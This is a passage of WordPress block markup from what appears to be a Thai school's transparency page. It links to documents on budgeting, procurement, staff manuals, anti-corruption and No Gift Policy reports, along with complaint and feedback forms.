900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1ZP0lY1uWV2IQ20oOS1Vb_P11dTUVoRrK/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1ZP0lY1uWV2IQ20oOS1Vb_P11dTUVoRrK/view?usp=share_link\">แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\">แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\">คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</a></strong><br> <a href=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\">    - คู่มือฝ่ายบริหารงานงบประมาณ</a><br> <a href=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\"> - คู่มือฝ่ายบริหารงานวิชาการ</a><br> <a href=\"https://drive.google.com/file/d/1qKTCUzkpxq5KGBSV23JUe989WP112FZv/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1qKTCUzkpxq5KGBSV23JUe989WP112FZv/view?usp=share_link\">- คู่มือฝ่ายบริหารงานบุคคล</a><br> <a href=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\">  </a><a href=\"https://drive.google.com/file/d/14pibk03Y3KVvKw1bp6bOYJB0RjcxVkC2/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/14pibk03Y3KVvKw1bp6bOYJB0RjcxVkC2/view?usp=share_link\">- คู่มือฝ่ายบริหารงานทั่วไป</a></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">E-Service</a></strong><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">สถิติการมาเรียน </a><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">ตรวจสอบผลการเรียน</a><br>      -  <a href=\"https://www.obec.go.th\" data-type=\"link\" data-id=\"https://www.obec.go.th\">OBEC</a><br>      -  <a href=\"http://contentcenter.obec.go.th\" data-type=\"link\" data-id=\"http://contentcenter.obec.go.th\">OBEC Content Center</a><br>      -  <a href=\"https://a6702.obec.expert/authen/login\" data-type=\"link\" data-id=\"https://a6702.obec.expert/authen/login\">School MIS</a><br>      -  <a href=\"https://portal.bopp-obec.info/obec67\" data-type=\"link\" data-id=\"https://portal.bopp-obec.info/obec67\">ข้อมูลนักเรียนรายบุคคล (DMC)</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\">ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1woP9ChkM3zQI8gthAIPX43-z4ymQZZLk/view?usp=drive_link\" data-type=\"page\" data-id=\"2\">ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1JpT_5pzV7hlbP1epiDCWYSAQG-UOkUeD/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1JpT_5pzV7hlbP1epiDCWYSAQG-UOkUeD/view?usp=drive_link\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1YhuyYvmrvtvgv6jkYfYHMulIorbiuLIA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\">รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1Nf4XWZmTyc4NdsmEJfShsVdo2WXGwzgr/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\">ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\">การขับเคลื่อนจริยธรรม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1fYwZNgW-VtyshJmctqYo_ZKlKE-M6JS1/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1fYwZNgW-VtyshJmctqYo_ZKlKE-M6JS1/view?usp=drive_link\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://forms.gle/KBRUecqKvRqxgrPm7\" data-type=\"link\" data-id=\"https://forms.gle/KBRUecqKvRqxgrPm7\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/15xtXTS0J1eFadldJs36XtPWecBT7tkDc/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\">ป</a><a href=\"http://watprato.ssk.in.th/?page_id=2\" data-type=\"page\" data-id=\"2\">ระกาศเจตนารมณ์นโยบาย No G</a><a href=\"https://drive.google.com/file/d/15xtXTS0J1eFadldJs36XtPWecBT7tkDc/view?usp=drive_link\" data-type=\"page\" data-id=\"2\">ift Policy จากการปฏิบัติหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\">การสร้างวัฒนธรรม&nbsp; No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\">รายงานผลตามนโยบาย No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1wNSqiMcHi_t5jB4xfBXvDdIG8ZIfSKHC/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QpgojOLg93xMFq319R5HXVloKfolMM6v/view?usp=share_link\">รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1wNSqiMcHi_t5jB4xfBXvDdIG8ZIfSKHC/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\">การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1wNSqiMcHi_t5jB4xfBXvDdIG8ZIfSKHC/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\">รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\">แผนการปฏิบัติการป้องกันการทุจริต</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\">รายงานการดำเนินการป้องกันการทุจริตประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\">รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_ecdd7d-71\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://forms.gle/ogsMCed1YfypogeK8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"https://forms.gle/ZyUhBS2TYmZiZVPR6\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"https://forms.gle/6upfY9jUcbu2kPti8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} 